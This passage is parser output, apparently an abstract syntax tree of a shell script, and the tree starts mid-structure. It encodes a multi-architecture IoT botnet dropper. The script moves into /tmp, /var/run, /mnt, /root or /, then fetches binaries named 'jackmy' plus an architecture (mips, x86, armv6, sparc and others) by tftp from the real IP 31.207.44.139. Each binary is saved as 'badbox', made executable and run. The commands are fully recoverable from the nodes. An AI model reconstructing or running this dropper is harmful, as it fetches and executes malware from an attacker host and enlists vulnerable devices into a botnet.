  OperatorNode(lineno=15, op=';', pos=(1519, 1520)),
  CommandNode(lineno=15, pos=(1520, 1528), parts=[
    WordNode(lineno=15, pos=(1520, 1528), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1529, 1657), parts=[
  CommandNode(lineno=16, pos=(1529, 1536), parts=[
    WordNode(lineno=16, pos=(1529, 1531), word='cd'),
    WordNode(lineno=16, pos=(1532, 1536), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1537, 1539)),
  CommandNode(lineno=16, pos=(1540, 1551), parts=[
    WordNode(lineno=16, pos=(1540, 1542), word='cd'),
    WordNode(lineno=16, pos=(1543, 1551), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1552, 1554)),
  CommandNode(lineno=16, pos=(1555, 1562), parts=[
    WordNode(lineno=16, pos=(1555, 1557), word='cd'),
    WordNode(lineno=16, pos=(1558, 1562), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1563, 1565)),
  CommandNode(lineno=16, pos=(1566, 1574), parts=[
    WordNode(lineno=16, pos=(1566, 1568), word='cd'),
    WordNode(lineno=16, pos=(1569, 1574), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1575, 1577)),
  CommandNode(lineno=16, pos=(1578, 1582), parts=[
    WordNode(lineno=16, pos=(1578, 1580), word='cd'),
    WordNode(lineno=16, pos=(1581, 1582), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1582, 1583)),
  CommandNode(lineno=16, pos=(1584, 1617), parts=[
    WordNode(lineno=16, pos=(1584, 1588), word='tftp'),
    WordNode(lineno=16, pos=(1589, 1602), word='31.207.44.139'),
    WordNode(lineno=16, pos=(1603, 1605), word='-c'),
    WordNode(lineno=16, pos=(1606, 1609), word='get'),
    WordNode(lineno=16, pos=(1610, 1617), word='telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1617, 1618)),
  CommandNode(lineno=16, pos=(1618, 1637), parts=[
    WordNode(lineno=16, pos=(1618, 1621), word='cat'),
    WordNode(lineno=16, pos=(1622, 1629), word='telnetd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1631, 1637), word='badbox'), pos=(1630, 1637), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1637, 1638)),
  CommandNode(lineno=16, pos=(1638, 1648), parts=[
    WordNode(lineno=16, pos=(1638, 1643), word='chmod'),
    WordNode(lineno=16, pos=(1644, 1646), word='+x'),
    WordNode(lineno=16, pos=(1647, 1648), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1648, 1649)),
  CommandNode(lineno=16, pos=(1649, 1657), parts=[
    WordNode(lineno=16, pos=(1649, 1657), word='./badbox'),
  ]),
])
CommandNode(lineno=17, pos=(1658, 1688), parts=[
  WordNode(lineno=17, pos=(1658, 1660), word='cp'),
  WordNode(lineno=17, pos=(1661, 1673), word='/bin/busybox'),
  WordNode(lineno=17, pos=(1674, 1676), word='-O'),
  WordNode(lineno=17, pos=(1677, 1688), word='/tmp/badbox'),
])
ListNode(lineno=18, pos=(1689, 1772), parts=[
  CommandNode(lineno=18, pos=(1689, 1727), parts=[
    WordNode(lineno=18, pos=(1689, 1693), word='tftp'),
    WordNode(lineno=18, pos=(1694, 1707), word='31.207.44.139'),
    WordNode(lineno=18, pos=(1708, 1710), word='-c'),
    WordNode(lineno=18, pos=(1711, 1714), word='get'),
    WordNode(lineno=18, pos=(1715, 1727), word='jackmymipsel'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1727, 1728)),
  CommandNode(lineno=18, pos=(1728, 1752), parts=[
    WordNode(lineno=18, pos=(1728, 1731), word='cat'),
    WordNode(lineno=18, pos=(1732, 1744), word='jackmymipsel'),
    RedirectNode(lineno=18, output=
      WordNode(lineno=18, pos=(1746, 1752), word='badbox'), pos=(1745, 1752), type='>'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1752, 1753)),
  CommandNode(lineno=18, pos=(1753, 1763), parts=[
    WordNode(lineno=18, pos=(1753, 1758), word='chmod'),
    WordNode(lineno=18, pos=(1759, 1761), word='+x'),
    WordNode(lineno=18, pos=(1762, 1763), word='*'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1763, 1764)),
  CommandNode(lineno=18, pos=(1764, 1772), parts=[
    WordNode(lineno=18, pos=(1764, 1772), word='./badbox'),
  ]),
])
ListNode(lineno=19, pos=(1773, 1852), parts=[
  CommandNode(lineno=19, pos=(1773, 1809), parts=[
    WordNode(lineno=19, pos=(1773, 1777), word='tftp'),
    WordNode(lineno=19, pos=(1778, 1791), word='31.207.44.139'),
    WordNode(lineno=19, pos=(1792, 1794), word='-c'),
    WordNode(lineno=19, pos=(1795, 1798), word='get'),
    WordNode(lineno=19, pos=(1799, 1809), word='jackmymips'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1809, 1810)),
  CommandNode(lineno=19, pos=(1810, 1832), parts=[
    WordNode(lineno=19, pos=(1810, 1813), word='cat'),
    WordNode(lineno=19, pos=(1814, 1824), word='jackmymips'),
    RedirectNode(lineno=19, output=
      WordNode(lineno=19, pos=(1826, 1832), word='badbox'), pos=(1825, 1832), type='>'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1832, 1833)),
  CommandNode(lineno=19, pos=(1833, 1843), parts=[
    WordNode(lineno=19, pos=(1833, 1838), word='chmod'),
    WordNode(lineno=19, pos=(1839, 1841), word='+x'),
    WordNode(lineno=19, pos=(1842, 1843), word='*'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1843, 1844)),
  CommandNode(lineno=19, pos=(1844, 1852), parts=[
    WordNode(lineno=19, pos=(1844, 1852), word='./badbox'),
  ]),
])
ListNode(lineno=20, pos=(1853, 1930), parts=[
  CommandNode(lineno=20, pos=(1853, 1888), parts=[
    WordNode(lineno=20, pos=(1853, 1857), word='tftp'),
    WordNode(lineno=20, pos=(1858, 1871), word='31.207.44.139'),
    WordNode(lineno=20, pos=(1872, 1874), word='-c'),
    WordNode(lineno=20, pos=(1875, 1878), word='get'),
    WordNode(lineno=20, pos=(1879, 1888), word='jackmysh4'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1888, 1889)),
  CommandNode(lineno=20, pos=(1889, 1910), parts=[
    WordNode(lineno=20, pos=(1889, 1892), word='cat'),
    WordNode(lineno=20, pos=(1893, 1902), word='jackmysh4'),
    RedirectNode(lineno=20, output=
      WordNode(lineno=20, pos=(1904, 1910), word='badbox'), pos=(1903, 1910), type='>'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1910, 1911)),
  CommandNode(lineno=20, pos=(1911, 1921), parts=[
    WordNode(lineno=20, pos=(1911, 1916), word='chmod'),
    WordNode(lineno=20, pos=(1917, 1919), word='+x'),
    WordNode(lineno=20, pos=(1920, 1921), word='*'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1921, 1922)),
  CommandNode(lineno=20, pos=(1922, 1930), parts=[
    WordNode(lineno=20, pos=(1922, 1930), word='./badbox'),
  ]),
])
ListNode(lineno=21, pos=(1931, 2008), parts=[
  CommandNode(lineno=21, pos=(1931, 1966), parts=[
    WordNode(lineno=21, pos=(1931, 1935), word='tftp'),
    WordNode(lineno=21, pos=(1936, 1949), word='31.207.44.139'),
    WordNode(lineno=21, pos=(1950, 1952), word='-c'),
    WordNode(lineno=21, pos=(1953, 1956), word='get'),
    WordNode(lineno=21, pos=(1957, 1966), word='jackmyx86'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(1966, 1967)),
  CommandNode(lineno=21, pos=(1967, 1988), parts=[
    WordNode(lineno=21, pos=(1967, 1970), word='cat'),
    WordNode(lineno=21, pos=(1971, 1980), word='jackmyx86'),
    RedirectNode(lineno=21, output=
      WordNode(lineno=21, pos=(1982, 1988), word='badbox'), pos=(1981, 1988), type='>'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(1988, 1989)),
  CommandNode(lineno=21, pos=(1989, 1999), parts=[
    WordNode(lineno=21, pos=(1989, 1994), word='chmod'),
    WordNode(lineno=21, pos=(1995, 1997), word='+x'),
    WordNode(lineno=21, pos=(1998, 1999), word='*'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(1999, 2000)),
  CommandNode(lineno=21, pos=(2000, 2008), parts=[
    WordNode(lineno=21, pos=(2000, 2008), word='./badbox'),
  ]),
])
ListNode(lineno=22, pos=(2009, 2090), parts=[
  CommandNode(lineno=22, pos=(2009, 2046), parts=[
    WordNode(lineno=22, pos=(2009, 2013), word='tftp'),
    WordNode(lineno=22, pos=(2014, 2027), word='31.207.44.139'),
    WordNode(lineno=22, pos=(2028, 2030), word='-c'),
    WordNode(lineno=22, pos=(2031, 2034), word='get'),
    WordNode(lineno=22, pos=(2035, 2046), word='jackmyarmv6'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2046, 2047)),
  CommandNode(lineno=22, pos=(2047, 2070), parts=[
    WordNode(lineno=22, pos=(2047, 2050), word='cat'),
    WordNode(lineno=22, pos=(2051, 2062), word='jackmyarmv6'),
    RedirectNode(lineno=22, output=
      WordNode(lineno=22, pos=(2064, 2070), word='badbox'), pos=(2063, 2070), type='>'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2070, 2071)),
  CommandNode(lineno=22, pos=(2071, 2081), parts=[
    WordNode(lineno=22, pos=(2071, 2076), word='chmod'),
    WordNode(lineno=22, pos=(2077, 2079), word='+x'),
    WordNode(lineno=22, pos=(2080, 2081), word='*'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2081, 2082)),
  CommandNode(lineno=22, pos=(2082, 2090), parts=[
    WordNode(lineno=22, pos=(2082, 2090), word='./badbox'),
  ]),
])
ListNode(lineno=23, pos=(2091, 2170), parts=[
  CommandNode(lineno=23, pos=(2091, 2127), parts=[
    WordNode(lineno=23, pos=(2091, 2095), word='tftp'),
    WordNode(lineno=23, pos=(2096, 2109), word='31.207.44.139'),
    WordNode(lineno=23, pos=(2110, 2112), word='-c'),
    WordNode(lineno=23, pos=(2113, 2116), word='get'),
    WordNode(lineno=23, pos=(2117, 2127), word='jackmyi686'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2127, 2128)),
  CommandNode(lineno=23, pos=(2128, 2150), parts=[
    WordNode(lineno=23, pos=(2128, 2131), word='cat'),
    WordNode(lineno=23, pos=(2132, 2142), word='jackmyi686'),
    RedirectNode(lineno=23, output=
      WordNode(lineno=23, pos=(2144, 2150), word='badbox'), pos=(2143, 2150), type='>'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2150, 2151)),
  CommandNode(lineno=23, pos=(2151, 2161), parts=[
    WordNode(lineno=23, pos=(2151, 2156), word='chmod'),
    WordNode(lineno=23, pos=(2157, 2159), word='+x'),
    WordNode(lineno=23, pos=(2160, 2161), word='*'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2161, 2162)),
  CommandNode(lineno=23, pos=(2162, 2170), parts=[
    WordNode(lineno=23, pos=(2162, 2170), word='./badbox'),
  ]),
])
ListNode(lineno=24, pos=(2171, 2256), parts=[
  CommandNode(lineno=24, pos=(2171, 2210), parts=[
    WordNode(lineno=24, pos=(2171, 2175), word='tftp'),
    WordNode(lineno=24, pos=(2176, 2189), word='31.207.44.139'),
    WordNode(lineno=24, pos=(2190, 2192), word='-c'),
    WordNode(lineno=24, pos=(2193, 2196), word='get'),
    WordNode(lineno=24, pos=(2197, 2210), word='jackmypowerpc'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2210, 2211)),
  CommandNode(lineno=24, pos=(2211, 2236), parts=[
    WordNode(lineno=24, pos=(2211, 2214), word='cat'),
    WordNode(lineno=24, pos=(2215, 2228), word='jackmypowerpc'),
    RedirectNode(lineno=24, output=
      WordNode(lineno=24, pos=(2230, 2236), word='badbox'), pos=(2229, 2236), type='>'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2236, 2237)),
  CommandNode(lineno=24, pos=(2237, 2247), parts=[
    WordNode(lineno=24, pos=(2237, 2242), word='chmod'),
    WordNode(lineno=24, pos=(2243, 2245), word='+x'),
    WordNode(lineno=24, pos=(2246, 2247), word='*'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2247, 2248)),
  CommandNode(lineno=24, pos=(2248, 2256), parts=[
    WordNode(lineno=24, pos=(2248, 2256), word='./badbox'),
  ]),
])
ListNode(lineno=25, pos=(2257, 2336), parts=[
  CommandNode(lineno=25, pos=(2257, 2293), parts=[
    WordNode(lineno=25, pos=(2257, 2261), word='tftp'),
    WordNode(lineno=25, pos=(2262, 2275), word='31.207.44.139'),
    WordNode(lineno=25, pos=(2276, 2278), word='-c'),
    WordNode(lineno=25, pos=(2279, 2282), word='get'),
    WordNode(lineno=25, pos=(2283, 2293), word='jackmyi586'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2293, 2294)),
  CommandNode(lineno=25, pos=(2294, 2316), parts=[
    WordNode(lineno=25, pos=(2294, 2297), word='cat'),
    WordNode(lineno=25, pos=(2298, 2308), word='jackmyi586'),
    RedirectNode(lineno=25, output=
      WordNode(lineno=25, pos=(2310, 2316), word='badbox'), pos=(2309, 2316), type='>'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2316, 2317)),
  CommandNode(lineno=25, pos=(2317, 2327), parts=[
    WordNode(lineno=25, pos=(2317, 2322), word='chmod'),
    WordNode(lineno=25, pos=(2323, 2325), word='+x'),
    WordNode(lineno=25, pos=(2326, 2327), word='*'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2327, 2328)),
  CommandNode(lineno=25, pos=(2328, 2336), parts=[
    WordNode(lineno=25, pos=(2328, 2336), word='./badbox'),
  ]),
])
ListNode(lineno=26, pos=(2337, 2416), parts=[
  CommandNode(lineno=26, pos=(2337, 2373), parts=[
    WordNode(lineno=26, pos=(2337, 2341), word='tftp'),
    WordNode(lineno=26, pos=(2342, 2355), word='31.207.44.139'),
    WordNode(lineno=26, pos=(2356, 2358), word='-c'),
    WordNode(lineno=26, pos=(2359, 2362), word='get'),
    WordNode(lineno=26, pos=(2363, 2373), word='jackmym86k'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2373, 2374)),
  CommandNode(lineno=26, pos=(2374, 2396), parts=[
    WordNode(lineno=26, pos=(2374, 2377), word='cat'),
    WordNode(lineno=26, pos=(2378, 2388), word='jackmym86k'),
    RedirectNode(lineno=26, output=
      WordNode(lineno=26, pos=(2390, 2396), word='badbox'), pos=(2389, 2396), type='>'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2396, 2397)),
  CommandNode(lineno=26, pos=(2397, 2407), parts=[
    WordNode(lineno=26, pos=(2397, 2402), word='chmod'),
    WordNode(lineno=26, pos=(2403, 2405), word='+x'),
    WordNode(lineno=26, pos=(2406, 2407), word='*'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2407, 2408)),
  CommandNode(lineno=26, pos=(2408, 2416), parts=[
    WordNode(lineno=26, pos=(2408, 2416), word='./badbox'),
  ]),
])
ListNode(lineno=27, pos=(2417, 2498), parts=[
  CommandNode(lineno=27, pos=(2417, 2454), parts=[
    WordNode(lineno=27, pos=(2417, 2421), word='tftp'),
    WordNode(lineno=27, pos=(2422, 2435), word='31.207.44.139'),
    WordNode(lineno=27, pos=(2436, 2438), word='-c'),
    WordNode(lineno=27, pos=(2439, 2442), word='get'),
    WordNode(lineno=27, pos=(2443, 2454), word='jackmysparc'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(2454, 2455)),
  CommandNode(lineno=27, pos=(2455, 2478), parts=[
    WordNode(lineno=27, pos=(2455, 2458), word='cat'),
    WordNode(lineno=27, pos=(2459, 2470), word='jackmysparc'),
    RedirectNode(lineno=27, output=
      WordNode(lineno=27, pos=(2472, 2478), word='badbox'), pos=(2471, 2478), type='>'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(2478, 2479)),
  CommandNode(lineno=27, pos=(2479, 2489), parts=[
    WordNode(lineno=27, pos=(2479, 2484), word='chmod'),
    WordNode(lineno=27, pos=(2485, 2487), word='+x'),
    WordNode(lineno=27, pos=(2488, 2489), word='*'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(2489, 2490)),
  CommandNode(lineno=27, pos=(2490, 2498), parts=[
    WordNode(lineno=27, pos=(2490, 2498), word='./badbox'),
  ]),
])
